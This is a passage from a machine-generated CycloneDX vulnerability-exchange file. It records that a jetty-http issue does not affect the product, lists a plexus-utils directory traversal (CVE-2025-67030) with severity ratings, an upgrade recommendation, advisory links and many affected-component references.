          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "There is no URI parsing confusion in Confluent\u2019s use cases."
      }
    },
    {
      "id": "CVE-2025-67030",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.3,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        22
      ],
      "description": "Directory Traversal vulnerability in the extractFile method of org.codehaus.plexus.util.Expand in plexus-utils before 6d780b3378829318ba5c2d29547e0012d5b29642. This allows an attacker to execute arbitrary code",
      "recommendation": "Upgrade org.codehaus.plexus:plexus-utils to version 4.0.3, 3.6.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-67030"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-67030"
        },
        {
          "url": "https://gist.github.com/weaver4VD/3216dac645220f8c9b488362f61241ec"
        },
        {
          "url": "https://github.com/codehaus-plexus/plexus-utils"
        },
        {
          "url": "https://github.com/codehaus-plexus/plexus-utils/commit/6d780b3378829318ba5c2d29547e0012d5b29642"
        },
        {
          "url": "https://github.com/codehaus-plexus/plexus-utils/issues/294"
        },
        {
          "url": "https://github.com/codehaus-plexus/plexus-utils/pull/295"
        },
        {
          "url": "https://github.com/codehaus-plexus/plexus-utils/pull/296"
        },
        {
          "url": "https://github.com/codehaus-plexus/plexus-utils/releases/tag/plexus-utils-4.0.3"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67030"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-67030"
        }
      ],
      "published": "2026-03-25T18:16:25+00:00",
      "updated": "2026-05-01T17:12:22+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1",
          "versions": [
            {
              "version": "3.5.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1",
          "versions": [
            {
              "version": "3.5.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1",
          "versions": [
            {
              "version": "3.5.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1",
          "versions": [
            {
              "version": "3.5.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4a4dd2bc-6990-48b7-b48d-9942288a9e42"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4a4dd2bc-6990-48b7-b48d-9942288a9e42"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4a4dd2bc-6990-48b7-b48d-9942288a9e42"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4a4dd2bc-6990-48b7-b48d-9942288a9e42"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0da77a70-84c2-4c08-b69f-eb9b8e0acfbf"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0da77a70-84c2-4c08-b69f-eb9b8e0acfbf"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0da77a70-84c2-4c08-b69f-eb9b8e0acfbf"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0da77a70-84c2-4c08-b69f-eb9b8e0acfbf"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#39ea5250-432d-491e-aa54-a337f40099a0"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#39ea5250-432d-491e-aa54-a337f40099a0"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#39ea5250-432d-491e-aa54-a337f40099a0"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#39ea5250-432d-491e-aa54-a337f40099a0"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#502cc6e1-28cd-4ca4-a16c-bf5c3e5cc622"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#502cc6e1-28cd-4ca4-a16c-bf5c3e5cc622"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#502cc6e1-28cd-4ca4-a16c-bf5c3e5cc622"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#502cc6e1-28cd-4ca4-a16c-bf5c3e5cc622"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#17892aab-697a-4e04-b1b4-5518a64cbf5f"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#17892aab-697a-4e04-b1b4-5518a64cbf5f"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#17892aab-697a-4e04-b1b4-5518a64cbf5f"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#17892aab-697a-4e04-b1b4-5518a64cbf5f"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#04d9e629-0c5d-440c-a143-fe2a188460f5"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#04d9e629-0c5d-440c-a143-fe2a188460f5"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#04d9e629-0c5d-440c-a143-fe2a188460f5"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#04d9e629-0c5d-440c-a143-fe2a188460f5"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#47db02c4-9e3d-41ae-97d8-e0469f054a43"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#47db02c4-9e3d-41ae-97d8-e0469f054a43"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#47db02c4-9e3d-41ae-97d8-e0469f054a43"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#47db02c4-9e3d-41ae-97d8-e0469f054a43"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#26d19541-4fa8-4fa4-877b-8135344ca72a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#26d19541-4fa8-4fa4-877b-8135344ca72a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#26d19541-4fa8-4fa4-877b-8135344ca72a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#26d19541-4fa8-4fa4-877b-8135344ca72a"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
